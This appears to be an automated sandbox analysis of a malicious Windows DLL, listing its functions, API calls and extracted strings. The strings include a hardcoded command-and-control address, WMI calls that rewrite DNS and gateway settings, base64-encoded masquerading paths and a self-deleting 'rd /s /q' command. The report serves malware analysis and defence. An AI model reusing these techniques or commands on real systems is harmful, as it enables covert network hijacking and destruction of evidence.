                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitVariant$ArrayCreateSafe
                                                                                                                                            • String ID: DNSServerSearchOrder$DefaultIPGateway$GatewayCostMetric$IPEnabled=TRUE$Index$SetDNSServerSearchOrder$SetGateways$Win32_NetworkAdapterConfiguration$Win32_NetworkAdapterConfiguration.Index=$p=)u
                                                                                                                                            • API String ID: 2640012081-3999083044
                                                                                                                                            • Opcode ID: 12229ab9ea9be2b5515b3a4e7304c5cbd28c893a32b3e86cd77fead74930fbe5
                                                                                                                                            • Instruction ID: ecf29a1c47d91b81846b45f5da98bbb69cd4e5f42de0d6ad34227a81938465a8
                                                                                                                                            • Opcode Fuzzy Hash: 12229ab9ea9be2b5515b3a4e7304c5cbd28c893a32b3e86cd77fead74930fbe5
                                                                                                                                            • Instruction Fuzzy Hash: DAD17E70D00209EFEB15CFA4C8809EEBBB8FF49780F104419F419AB259DB75AA45CFA1
                                                                                                                                            Function 10005989 Relevance: 25.6, APIs: 4, Strings: 13, Instructions: 81COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: wsprintf
                                                                                                                                            • String ID: %s\%s$%s\version.txt$12010043$12010043$C:\Users\user\Desktop$C:\Users\user\Desktop\12010043$C:\Users\user\Desktop\QCTYoyX422.dll$C:\Users\user\Desktop\version.txt$C:\Windows\SysWOW64\rundll32.exe$ECF4BB570DC9$M%s$Mhost123.zz.am:6658$host123.zz.am:6658
                                                                                                                                            • API String ID: 2111968516-2931517777
                                                                                                                                            • Opcode ID: 857beac2df9e912fa28a8a8c5910c135d4b4ee4941f056ece51d960c3556155a
                                                                                                                                            • Instruction ID: 32e0762688fea209a997a92a9e142d3ada4c65c650573aee4fc5e34dd7d3b294
                                                                                                                                            • Opcode Fuzzy Hash: 857beac2df9e912fa28a8a8c5910c135d4b4ee4941f056ece51d960c3556155a
                                                                                                                                            • Instruction Fuzzy Hash: 961159356007197BF210E7919C45F5F7E9CDF896A6F01021DFB01AE181DB76F9818A72
                                                                                                                                            Function 10004D36 Relevance: 23.1, APIs: 5, Strings: 8, Instructions: 308COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 10004EC5
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 10004ECB
                                                                                                                                            • VariantInit.OLEAUT32(?), ref: 10004ED1
                                                                                                                                            • VariantInit.OLEAUT32(?,?,?,?,?,?,?,?,?,10016AD0,00000000,00080000), ref: 10005009
                                                                                                                                            • VariantInit.OLEAUT32(?,?,?,?,?,?,?,?,?,10016AD0,00000000,00080000), ref: 1000500F
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitVariant
                                                                                                                                            • String ID: CommandLine$Name$ProcessID$SELECT * FROM $WQL$p=)u$svchost.exe$svchost.exe -k NetworkService
                                                                                                                                            • API String ID: 1927566239-2636284693
                                                                                                                                            • Opcode ID: b6f3bf19f9a655f11ce33ea3d1eef9f97ff5ff13253a98ebad0314bfa4936779
                                                                                                                                            • Instruction ID: f681daf1cfe066dfb2c65bb1802d225618d831e3fba353d21c944956626e3e16
                                                                                                                                            • Opcode Fuzzy Hash: b6f3bf19f9a655f11ce33ea3d1eef9f97ff5ff13253a98ebad0314bfa4936779
                                                                                                                                            • Instruction Fuzzy Hash: 23A159B1900209AFEB04DFA4CC81DEEBBBDEF48394F104569F515AB295DB31AE45CB60
                                                                                                                                            Function 1000570F Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 102filethreadCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • wsprintfA.USER32 ref: 1000574F
                                                                                                                                            • wsprintfA.USER32 ref: 100057B1
                                                                                                                                            • wsprintfA.USER32 ref: 100057C5
                                                                                                                                            • PrintFile.QCTYOYX422(?,?,00000000,?,?,?,?,?,?,?,10016AD0,00000000,00080000,?,1000720C), ref: 100057E8
                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,10005620,00000000,00000000,00000000), ref: 10005835
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: wsprintf$CreateFilePrintThread
                                                                                                                                            • String ID: %s\%s$ROOT\CIMv2$Win32_process$c:\windows\system32\drivers\%s$c:\windows\system32\drivers\%s\%s
                                                                                                                                            • API String ID: 1788855648-1421401311
                                                                                                                                            • Opcode ID: ae8518da5cd223e832b712c6548c98f9a89997a3f3d4d6029e7fac4c4bf50c1f
                                                                                                                                            • Instruction ID: 590dfccee83cd698aee2aff2a0aef7bd89598b4f0e32949fa848c193a7d694e7
                                                                                                                                            • Opcode Fuzzy Hash: ae8518da5cd223e832b712c6548c98f9a89997a3f3d4d6029e7fac4c4bf50c1f
                                                                                                                                            • Instruction Fuzzy Hash: 0531EA72910238BBEB21D7A4CC45FCF7B6CEB08356F0404A6F708FA051DB75AA858A91
                                                                                                                                            Function 100053B7 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 179sleepfileCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • wsprintfA.USER32 ref: 10005437
                                                                                                                                            • wsprintfA.USER32 ref: 1000549E
                                                                                                                                            • wsprintfA.USER32 ref: 100054BC
                                                                                                                                            • PrintFile.QCTYOYX422(?,?,10016594,?,00000000), ref: 100054DE
                                                                                                                                            • wsprintfA.USER32 ref: 10005582
                                                                                                                                            • Sleep.KERNEL32(000003E8,00000000,75A78400,?,40000000,00000001,00000000,00000002,00000000,00000000,7634C650,?,?,00000009,00000000,10016594), ref: 100055AE
                                                                                                                                            Strings
                                                                                                                                            • c:\windows\system32\drivers\%s, xrefs: 10005498
                                                                                                                                            • Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz, xrefs: 100054A9
                                                                                                                                            • %s\%s, xrefs: 10005431
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: wsprintf$FilePrintSleep
                                                                                                                                            • String ID: %s\%s$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz$c:\windows\system32\drivers\%s
                                                                                                                                            • API String ID: 518940211-4228670124
                                                                                                                                            • Opcode ID: c361d524b353549e0f38205e8cfe1225c09218ba4335209976bd8a7148bd2516
                                                                                                                                            • Instruction ID: 3567043749f32881e03762bb9a57e308b600a04db8eea4acb5e64ce7ea9520bd
                                                                                                                                            • Opcode Fuzzy Hash: c361d524b353549e0f38205e8cfe1225c09218ba4335209976bd8a7148bd2516
                                                                                                                                            • Instruction Fuzzy Hash: 9751C272900658BFEB11CB68CC45FEE73ADEB48341F1404A5FA08AB191DBB1FE858B50
                                                                                                                                            Function 10004351 Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 64sleepCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • Sleep.KERNEL32(?,?,?,cmd.exe), ref: 100043A6
                                                                                                                                            • Sleep.KERNEL32(000003E8), ref: 100043E5
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleep
                                                                                                                                            • String ID: QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LmV4ZQ==$QzpcXFdpbmRvd3NcXDZDNERBNkZCXFxzdmNoc290LnZpcg==$cmd.exe$self
                                                                                                                                            • API String ID: 3472027048-2620343502
                                                                                                                                            • Opcode ID: 3f59aa8a2a531e52e96b689b157fed57f8b0b4aca2b36427f54941e0ecbe5060
                                                                                                                                            • Instruction ID: 2962837d3e63ffe82077fec71eea4cc39f059f6aab2461bdb2792d37a05628b4
                                                                                                                                            • Opcode Fuzzy Hash: 3f59aa8a2a531e52e96b689b157fed57f8b0b4aca2b36427f54941e0ecbe5060
                                                                                                                                            • Instruction Fuzzy Hash: 370126BA000394BAFB12BB74EC46F9E3B5CDF452E2F120016F9446D086CEB5AA804565
                                                                                                                                            Function 10005F15 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 98timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcess.KERNEL32(00000001,SeShutdownPrivilege,00000001,00000000,00000000,?,000000BC,00000000,?,000000BC,00000000,?,00000128,00000000), ref: 10005F21
                                                                                                                                              • Part of subcall function 10004126: OpenProcessToken.ADVAPI32(00000028,00000028,00000028,10005F32,00000000,00000028,00000000,00000001,SeShutdownPrivilege,00000001,00000000,00000000,?,000000BC,00000000,?), ref: 10004132
                                                                                                                                              • Part of subcall function 100040F1: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,00000000), ref: 100040FD
                                                                                                                                            • ___crtGetTimeFormatEx.LIBCMT ref: 10005F79
                                                                                                                                              • Part of subcall function 1000404F: AdjustTokenPrivileges.ADVAPI32(00000000,00000010,?,00000000,00000000,10005F7E,?,10005F7E,00000000,00000000,?,00000010,00000000,00000000), ref: 10004064
                                                                                                                                            • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005FD4
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ProcessTimerToken$AdjustConcurrency::details::platform::__CreateCurrentFormatLookupOpenPrivilegePrivilegesQueueTimeValue___crt
                                                                                                                                            • String ID: %s\lang.ini$C:\Users\user\Desktop
                                                                                                                                            • API String ID: 3793502078-3123256004
                                                                                                                                            • Opcode ID: 4c2164c536502c8c7bf62064663df8d628c4358b27154a1aa27f72d12e264788
                                                                                                                                            • Instruction ID: ec7a4272703c46c275716bc18e38bfb45c62e376eb564a1a1e1e8047e794edd2
                                                                                                                                            • Opcode Fuzzy Hash: 4c2164c536502c8c7bf62064663df8d628c4358b27154a1aa27f72d12e264788
                                                                                                                                            • Instruction Fuzzy Hash: FE21BDB6D00119BEEB10DAA4CC02FEF7BBCDF04790F104021FA04E6185EA75AB809AE1
                                                                                                                                            Function 10005CF7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 70timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(00080000,10005C92,?,?,%s\lang.ini,C:\Users\user\Desktop,?,00000000,00080000), ref: 10003F76
                                                                                                                                            • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005D61
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
                                                                                                                                            • String ID: %s\lang.ini$C:\Users\user\Desktop$http://$search
                                                                                                                                            • API String ID: 1721638100-3849684823
                                                                                                                                            • Opcode ID: d1da8393b741fbea104cea0a346650b348cc7a6ae7d15635f455682e2727de3c
                                                                                                                                            • Instruction ID: d10eea2e68a17fc7dae01a0a692719cf89fcc4e95e635f9962b470bf74251c26
                                                                                                                                            • Opcode Fuzzy Hash: d1da8393b741fbea104cea0a346650b348cc7a6ae7d15635f455682e2727de3c
                                                                                                                                            • Instruction Fuzzy Hash: D81106769081197FFB61DAA4CC42FDB776CDB143D5F1045B2FB48A9080EA72AFC44A60
                                                                                                                                            Function 10005C4C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 63timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(00080000,10005C92,?,?,%s\lang.ini,C:\Users\user\Desktop,?,00000000,00080000), ref: 10003F76
                                                                                                                                            • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005CB6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
                                                                                                                                            • String ID: %s\lang.ini$C:\Users\user\Desktop$http://
                                                                                                                                            • API String ID: 1721638100-2151592823
                                                                                                                                            • Opcode ID: 354cb08d00e8bc516f166db664e2c84127a23412515739fcecc10b8ce6ebd26b
                                                                                                                                            • Instruction ID: 275623b6bb4d38d455d16e038d1f67d5d5eba5b08857937f3fa6caa2442e2442
                                                                                                                                            • Opcode Fuzzy Hash: 354cb08d00e8bc516f166db664e2c84127a23412515739fcecc10b8ce6ebd26b
                                                                                                                                            • Instruction Fuzzy Hash: 131104769041197EFB21DAA4CC42FDB776CDB14384F0085B1FA48B6080EA71AF884660
                                                                                                                                            Function 100087F4 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 32sleepCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            • C:\Users\user\Desktop, xrefs: 1000880B
                                                                                                                                            • Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=, xrefs: 10008810
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Sleepwsprintf
                                                                                                                                            • String ID: C:\Users\user\Desktop$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
                                                                                                                                            • API String ID: 1749205058-4198270437
                                                                                                                                            • Opcode ID: d826f062264427af496b9675ff0d63a37454a8e3147eb2671c5731483726d261
                                                                                                                                            • Instruction ID: cb8f3af107b47666e7401f40fe0349a9d09f1feb376e898973d7629cffdb37cc
                                                                                                                                            • Opcode Fuzzy Hash: d826f062264427af496b9675ff0d63a37454a8e3147eb2671c5731483726d261
                                                                                                                                            • Instruction Fuzzy Hash: 00F0AEF250019DABEB15CBA4CC857EA3768FF04285F040975F705F5051DBB19AC44A55
                                                                                                                                            Function 10007A62 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitVariant
                                                                                                                                            • String ID: $p=)u
                                                                                                                                            • API String ID: 1927566239-2710233430
                                                                                                                                            • Opcode ID: d0ca9816adfda9363097ead228823b8de7426d0966cf0e74972078de5e0d5c66
                                                                                                                                            • Instruction ID: ef89c2eb01536c9538a48ebd5608185a951f11054c82c4a53c762a0a2007c409
                                                                                                                                            • Opcode Fuzzy Hash: d0ca9816adfda9363097ead228823b8de7426d0966cf0e74972078de5e0d5c66
                                                                                                                                            • Instruction Fuzzy Hash: AB41A475D002599FEF14DFA4C884AEEB7F8FF05284F10446DE91AA3245DB38AE48CB61
                                                                                                                                            Function 10005F98 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31timeCOMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005FD4
                                                                                                                                              • Part of subcall function 10004015: CreateFileA.KERNEL32(00000080,00000003,00000000,00000000,80000000,?,10005CBB,?,10005CBB,?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 1000402D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4676345905.0000000010001000.00000040.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 00000003.00000002.4676314345.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676377100.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676411221.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676446379.000000001001E000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676481266.000000001003D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000003.00000002.4676516295.000000001004F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CreateTimer$Concurrency::details::platform::__FileQueue
                                                                                                                                            • String ID: %s\lang.ini$C:\Users\user\Desktop
                                                                                                                                            • API String ID: 3486561800-3123256004
                                                                                                                                            • Opcode ID: b1726d4115c593d66bb357bf89ab1e7ee1f9c93add6e05033f4287082a534528
                                                                                                                                            • Instruction ID: 2e9b22e8cb94d114ab57fa925500967999958ebf182bde47e5e7f2d31677baea
                                                                                                                                            • Opcode Fuzzy Hash: b1726d4115c593d66bb357bf89ab1e7ee1f9c93add6e05033f4287082a534528
                                                                                                                                            • Instruction Fuzzy Hash: 23E0687290112432E670D1669C07FCF3E9CDB857F4F000220B688E60C4DAB4AAC4C6E0